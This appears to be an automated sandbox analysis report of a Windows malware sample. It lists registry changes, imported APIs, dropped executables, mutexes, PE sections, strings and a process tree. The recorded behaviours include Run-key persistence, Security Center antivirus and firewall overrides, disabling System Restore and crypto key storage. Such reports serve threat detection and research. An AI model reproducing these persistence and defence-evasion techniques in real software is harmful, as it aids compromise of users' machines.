HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Keyboard Layout\Preload\1
HKEY_CURRENT_USER\Keyboard Layout\Preload\2
HKEY_CURRENT_USER\Keyboard Layout\Preload\3
HKEY_CURRENT_USER\Keyboard Layout\Preload\4
HKEY_CURRENT_USER\Keyboard Layout\Preload\5
HKEY_CURRENT_USER\Keyboard Layout\Preload\6
HKEY_CURRENT_USER\Keyboard Layout\Preload\7
HKEY_CURRENT_USER\Keyboard Layout\Preload\8
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\productName
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\NetworkProvider\HwOrder\ProviderOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ex_data\data\ext
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\public
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\private
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32FirstW
kernel32.dll.GlobalAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.memset
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.fclose
msvcrt.dll.fseek
msvcrt.dll.ftell
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wfopen
msvcrt.dll._snwprintf
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathFileExistsW
kernel32.dll.ExitThread
kernel32.dll.CreateFileW
kernel32.dll.GetModuleFileNameW
kernel32.dll.Sleep
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.CloseHandle
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.SetFileAttributesW
kernel32.dll.CreateThread
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.DeleteFileW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateProcessW
kernel32.dll.CreateDirectoryW
kernel32.dll.CopyFileW
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegQueryValueExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
msvcrt.dll.isalpha
msvcrt.dll.wcsstr
msvcrt.dll.isdigit
msvcrt.dll.memcpy
kernel32.dll.GetFileAttributesW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.GetDriveTypeW
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.GlobalUnlock
kernel32.dll.GlobalLock
kernel32.dll.FindNextFileW
kernel32.dll.GetVolumeInformationW
user32.dll.OpenClipboard
user32.dll.EmptyClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.SetClipboardData
ole32.dll.CoInitialize
kernel32.dll.OpenMutexW
kernel32.dll.GetSystemInfo
kernel32.dll.WaitForMultipleObjects
kernel32.dll.lstrcmpiW
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.DeleteCriticalSection
kernel32.dll.GetShortPathNameW
kernel32.dll.GetWindowsDirectoryW
kernel32.dll.lstrcpyA
kernel32.dll.lstrcmpiA
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.VirtualLock
kernel32.dll.MoveFileExW
kernel32.dll.FindFirstFileExW
kernel32.dll.WideCharToMultiByte
kernel32.dll.lstrcmpW
kernel32.dll.GetSystemTime
kernel32.dll.GetNativeSystemInfo
kernel32.dll.GetDiskFreeSpaceW
kernel32.dll.VirtualUnlock
kernel32.dll.VerSetConditionMask
kernel32.dll.VerifyVersionInfoW
kernel32.dll.SetLastError
kernel32.dll.LocalAlloc
kernel32.dll.LocalFree
kernel32.dll.MulDiv
kernel32.dll.GetTempPathW
kernel32.dll.GlobalFree
kernel32.dll.ConnectNamedPipe
kernel32.dll.CreateNamedPipeW
kernel32.dll.CreateEventW
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetFullPathNameW
kernel32.dll.SetStdHandle
kernel32.dll.GetConsoleMode
kernel32.dll.GetConsoleCP
kernel32.dll.FlushFileBuffers
kernel32.dll.OutputDebugStringW
kernel32.dll.HeapAlloc
kernel32.dll.RtlUnwind
kernel32.dll.OpenProcess
kernel32.dll.InitializeCriticalSection
kernel32.dll.GetDriveTypeA
kernel32.dll.GetCommandLineA
kernel32.dll.GetProcessHeap
kernel32.dll.GetComputerNameW
kernel32.dll.WaitForSingleObject
kernel32.dll.GetSystemDefaultUILanguage
kernel32.dll.CreateMutexW
kernel32.dll.lstrcpyW
kernel32.dll.lstrcatW
kernel32.dll.GetProcAddress
kernel32.dll.LoadLibraryW
kernel32.dll.GetSystemDirectoryW
kernel32.dll.GetModuleHandleW
kernel32.dll.GetCurrentProcess
kernel32.dll.LoadLibraryExW
kernel32.dll.VirtualQuery
kernel32.dll.MultiByteToWideChar
kernel32.dll.lstrlenA
kernel32.dll.lstrlenW
kernel32.dll.ReadFile
kernel32.dll.UnlockFile
kernel32.dll.SetFilePointerEx
kernel32.dll.GetStdHandle
kernel32.dll.LCMapStringW
kernel32.dll.IsDebuggerPresent
kernel32.dll.TlsSetValue
kernel32.dll.TlsGetValue
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.GetStringTypeW
kernel32.dll.HeapFree
kernel32.dll.GetModuleHandleExW
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.IsValidCodePage
kernel32.dll.GetACP
kernel32.dll.GetOEMCP
kernel32.dll.GetCPInfo
kernel32.dll.GetCurrentThreadId
kernel32.dll.WriteConsoleW
user32.dll.SystemParametersInfoW
user32.dll.ReleaseDC
user32.dll.GetDC
user32.dll.wsprintfA
user32.dll.wsprintfW
user32.dll.CreateWindowStationW
user32.dll.SetProcessWindowStation
user32.dll.DrawTextA
user32.dll.DrawTextW
user32.dll.FillRect
user32.dll.GetForegroundWindow
gdi32.dll.SetTextColor
gdi32.dll.DeleteDC
gdi32.dll.GetDeviceCaps
gdi32.dll.GetDIBits
gdi32.dll.SetBkColor
gdi32.dll.SetPixel
gdi32.dll.DeleteObject
gdi32.dll.SelectObject
gdi32.dll.CreateCompatibleDC
gdi32.dll.CreateCompatibleBitmap
gdi32.dll.CreateFontW
gdi32.dll.GetObjectW
gdi32.dll.GetPixel
gdi32.dll.GetStockObject
gdi32.dll.SetBitmapBits
gdi32.dll.CreateBitmap
gdi32.dll.GetBitmapBits
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.OpenProcessToken
advapi32.dll.GetUserNameW
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptEncrypt
advapi32.dll.CryptImportKey
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptAcquireContextW
advapi32.dll.CryptExportKey
advapi32.dll.RegCreateKeyExW
shell32.dll.ShellExecuteExW
shell32.dll.SHGetSpecialFolderPathW
mpr.dll.WNetEnumResourceW
mpr.dll.WNetCloseEnum
mpr.dll.WNetOpenEnumW
wininet.dll.HttpOpenRequestW
wininet.dll.HttpSendRequestW
wininet.dll.InternetConnectW
rpcrt4.dll.NdrClientCall2
ntdll.dll.RtlComputeCrc32
cryptsp.dll.CryptAcquireContextW
advapi32.dll.CryptGenRandom
cryptsp.dll.CryptGenRandom
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGetKeyParam
cryptsp.dll.CryptEncrypt
user32.dll.LoadStringW
drprov.dll.NPGetCaps
drprov.dll.NPAddConnection
drprov.dll.NPAddConnection3
drprov.dll.NPCancelConnection
drprov.dll.NPGetConnection
drprov.dll.NPGetUniversalName
drprov.dll.NPOpenEnum
drprov.dll.NPEnumResource
drprov.dll.NPCloseEnum
drprov.dll.NPGetResourceParent
drprov.dll.NPGetResourceInformation
ntlanman.dll.NPGetCaps
ntlanman.dll.NPGetUser
ntlanman.dll.NPAddConnection
ntlanman.dll.NPAddConnection3
ntlanman.dll.NPGetReconnectFlags
ntlanman.dll.NPCancelConnection
ntlanman.dll.NPGetConnection
ntlanman.dll.NPGetConnection3
ntlanman.dll.NPGetUniversalName
ntlanman.dll.NPGetConnectionPerformance
ntlanman.dll.NPOpenEnum
ntlanman.dll.NPEnumResource
ntlanman.dll.NPCloseEnum
ntlanman.dll.NPFormatNetworkName
ntlanman.dll.NPGetResourceParent
ntlanman.dll.NPGetResourceInformation
davclnt.dll.NPGetCaps
davclnt.dll.NPGetUser
davclnt.dll.NPAddConnection
davclnt.dll.NPAddConnection3
davclnt.dll.NPCancelConnection
davclnt.dll.NPGetConnection
davclnt.dll.NPGetUniversalName
davclnt.dll.NPOpenEnum
davclnt.dll.NPEnumResource
davclnt.dll.NPCloseEnum
davclnt.dll.NPFormatNetworkName
davclnt.dll.NPGetResourceParent
davclnt.dll.NPGetResourceInformation
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
advapi32.dll.CreateWellKnownSid
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingSetAuthInfoExW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcBindingFree
wkscli.dll.NetWkstaGetInfo
cscapi.dll.CscNetApiGetInterface
netutils.dll.NetApiBufferFree
browcli.dll.NetServerEnum
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
netutils.dll.NetApiBufferAllocate
ntdll.dll.NtSetInformationFile
mpr.dll.WNetSetLastErrorW
rpcrt4.dll.I_RpcExceptionFilter
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
608605743
IESQMMUTEX_0_208
650870850508
Global\XlAKFoxSKGOfSGOoSFOOFNOLPE
Global\8B5BA5B9E369250F5F1C.lock

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00407e9d
Reported Checksum 0x00027747
Actual Checksum 0x00027747
Minimum OS Version 5.1
Compile Time 2017-12-13 13:38:41
Import Hash 7fcc8b9d7ca1591b5c9cd6b043691cb9

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00019a10 0x00019c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.83
.data 0x0001b000 0x0001fba8 0x00005e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.87
.mysec3 0x0003b000 0x00000005 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.mysec 0x0003c000 0x0000100a 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 0.00
.mysec10 0x0003e000 0x00000064 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003f000 0x00001d62 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.81
.reloc 0x00041000 0x00000ece 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.91

Imports

Library KERNEL32.dll:
0x401000 LocalFree
0x401004 GetLastError
0x401008 AddAtomW
0x401010 ExitProcess
0x401014 AddAtomA
0x401018 SetLastError
0x401020 GetStartupInfoA
0x401024 VirtualProtect
0x401028 GetProcAddress
0x40102c LoadLibraryA
0x401030 GetACP
0x401034 GlobalMemoryStatus
0x401038 GetCPInfo
0x40103c GetSystemTimes
0x401044 GetTickCount
0x401048 GetModuleHandleW
0x40104c EnumSystemLocalesA
0x401050 GetLocaleInfoA
0x401054 GetCommandLineA
0x401058 HeapSetInformation
0x40105c GetStartupInfoW
0x401064 EncodePointer
0x401068 DecodePointer
0x40106c HeapFree
0x401070 TlsAlloc
0x401074 TlsGetValue
0x401078 TlsSetValue
0x40107c TlsFree
0x401084 GetCurrentThreadId
0x40108c GetCurrentThread
0x401094 WriteFile
0x401098 GetStdHandle
0x40109c GetModuleFileNameW
0x4010a0 GetModuleFileNameA
0x4010a8 WideCharToMultiByte
0x4010b0 SetHandleCount
0x4010b8 GetFileType
0x4010c0 HeapCreate
0x4010c4 HeapDestroy
0x4010cc GetCurrentProcessId
0x4010d4 RaiseException
0x4010d8 GetOEMCP
0x4010dc IsValidCodePage
0x4010e4 IsDebuggerPresent
0x4010e8 TerminateProcess
0x4010ec GetCurrentProcess
0x4010f4 FatalAppExitA
0x4010fc Sleep
0x401104 FreeLibrary
0x401108 InterlockedExchange
0x40110c LoadLibraryW
0x401110 GetLocaleInfoW
0x401114 RtlUnwind
0x401118 LCMapStringW
0x40111c MultiByteToWideChar
0x401120 GetStringTypeW
0x401124 HeapAlloc
0x401128 HeapReAlloc
0x40112c HeapSize
0x401130 GetUserDefaultLCID
0x401134 IsValidLocale
Library USER32.dll:
0x40113c PeekMessageA

.text
`.data
.mysec3
.mysec
`.mysec10d
.rsrc
@.reloc
GlobalAlloc
kernel32.dll
@Module32FirstW
CreateToolhelp32Snapshot
floor
exp10
?acos
log10
e+000
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
_nextafter
_logb
frexp
_hypot
_cabs
ldexp
atan2
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SystemFunction036
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
1#QNAN
1#INF
1#IND
1#SNAN
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
#6*?.
65/%6
&3+726
&62-9$/
#"6.;
=+6))
(>9=8
8$>$>
;).,/
YQPVh
SVWUj
QW@Ph
LocalFree
GetLastError
AddAtomW
GetCurrentDirectoryA
ExitProcess
AddAtomA
SetLastError
GetProcessShutdownParameters
GetStartupInfoA
VirtualProtect
GetProcAddress
LoadLibraryA
GetACP
GlobalMemoryStatus
GetCPInfo
GetSystemTimes
FillConsoleOutputCharacterW
GetTickCount
GetModuleHandleW
KERNEL32.dll
PeekMessageA
USER32.dll
GetCommandLineA
HeapSetInformation
GetStartupInfoW
IsProcessorFeaturePresent
EncodePointer
DecodePointer
HeapFree
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetCurrentThreadId
InterlockedDecrement
GetCurrentThread
SetUnhandledExceptionFilter
WriteFile
GetStdHandle
GetModuleFileNameW
GetModuleFileNameA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
DeleteCriticalSection
HeapCreate
HeapDestroy
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RaiseException
GetOEMCP
IsValidCodePage
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
LeaveCriticalSection
FatalAppExitA
EnterCriticalSection
Sleep
SetConsoleCtrlHandler
FreeLibrary
InterlockedExchange
LoadLibraryW
GetLocaleInfoW
RtlUnwind
LCMapStringW
MultiByteToWideChar
GetStringTypeW
HeapAlloc
HeapReAlloc
HeapSize
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
dizerafasuma
tevakuvokogumiwubotahutucozame
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Yubokejuni. Kudihube kopukafoloze pi yiwa yayeha. Cubenegi jugudanepi kotigo di muwusocudiwuze. Mikeva sohirova.Tuya. Dolezosiwa yu humunicidu ladipibawe. Sa cavawice wecotuwijaharo rajuco. Zi bubajocejeda macaviye yojelefuwa hokenonohu. Wumipu tedi mabozodeseyile meje vuxotipufiteyi. Yapelitaya. Zukesi. Javobohisabiyo hoxu cojanu kazaha. Vi wexe peniwanegi. Kicudo (
6$7(7074787<7
X>\>`>d>h>l>p>t>x>|>
kernel32.dll
KERNEL32.DLL
mscoree.dll
runtime error
@Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
ADVAPI32.DLL
WUSER32.DLL
Kesodoxofezavu
VS_VERSION_INFO
StringFileInfo
457aa56b
FileVersion
3.4.6.86
InternalName
mukuge.exe
LegalCopyright
Copyright (C) 2018, vasupejen
ProductVersion
3.4.6.86
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


4X6zg5pg.exe, PID: 2992, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe
Command Line: "C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe"
winsvcs.exe, PID: 2912, Parent PID: 2992
Full Path: C:\Windows\5769805074060605\winsvcs.exe
Command Line: C:\Windows\5769805074060605\winsvcs.exe
2841536727.exe, PID: 2744, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2841536727.exe
Command Line: C:\Users\user\AppData\Local\Temp\2841536727.exe
winsvcs.exe, PID: 1340, Parent PID: 2744
Full Path: C:\Windows\806084767800850\winsvcs.exe
Command Line: C:\Windows\806084767800850\winsvcs.exe
3751939260.exe, PID: 2572, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\3751939260.exe
Command Line: C:\Users\user\AppData\Local\Temp\3751939260.exe
1495120250.exe, PID: 2956, Parent PID: 1340
Full Path: C:\Users\user\AppData\Local\Temp\1495120250.exe
Command Line: C:\Users\user\AppData\Local\Temp\1495120250.exe
1865041414.exe, PID: 2884, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1865041414.exe
Command Line: C:\Users\user\AppData\Local\Temp\1865041414.exe
1717238076.exe, PID: 1352, Parent PID: 1340
Full Path: C:\Users\user\AppData\Local\Temp\1717238076.exe
Command Line: C:\Users\user\AppData\Local\Temp\1717238076.exe
2080821079.exe, PID: 1132, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2080821079.exe
Command Line: C:\Users\user\AppData\Local\Temp\2080821079.exe
1257032286.exe, PID: 2332, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1257032286.exe
Command Line: C:\Users\user\AppData\Local\Temp\1257032286.exe
1674519319.exe, PID: 2528, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1674519319.exe
Command Line: C:\Users\user\AppData\Local\Temp\1674519319.exe
3065331339.exe, PID: 2436, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\3065331339.exe
Command Line: C:\Users\user\AppData\Local\Temp\3065331339.exe
3876917383.exe, PID: 3008, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\3876917383.exe
Command Line: C:\Users\user\AppData\Local\Temp\3876917383.exe
2810629864.exe, PID: 2208, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2810629864.exe
Command Line: C:\Users\user\AppData\Local\Temp\2810629864.exe
3750816931.exe, PID: 2924, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\3750816931.exe
Command Line: C:\Users\user\AppData\Local\Temp\3750816931.exe
1398632723.exe, PID: 2604, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1398632723.exe
Command Line: C:\Users\user\AppData\Local\Temp\1398632723.exe
4032832645.exe, PID: 2420, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\4032832645.exe
Command Line: C:\Users\user\AppData\Local\Temp\4032832645.exe
1674315261.exe, PID: 1356, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\1674315261.exe
Command Line: C:\Users\user\AppData\Local\Temp\1674315261.exe
2459023548.exe, PID: 1304, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\2459023548.exe
Command Line: C:\Users\user\AppData\Local\Temp\2459023548.exe
3304035876.exe, PID: 1936, Parent PID: 2912
Full Path: C:\Users\user\AppData\Local\Temp\3304035876.exe
Command Line: C:\Users\user\AppData\Local\Temp\3304035876.exe
2400240831.exe, PID: 2620, Parent PID: 2912
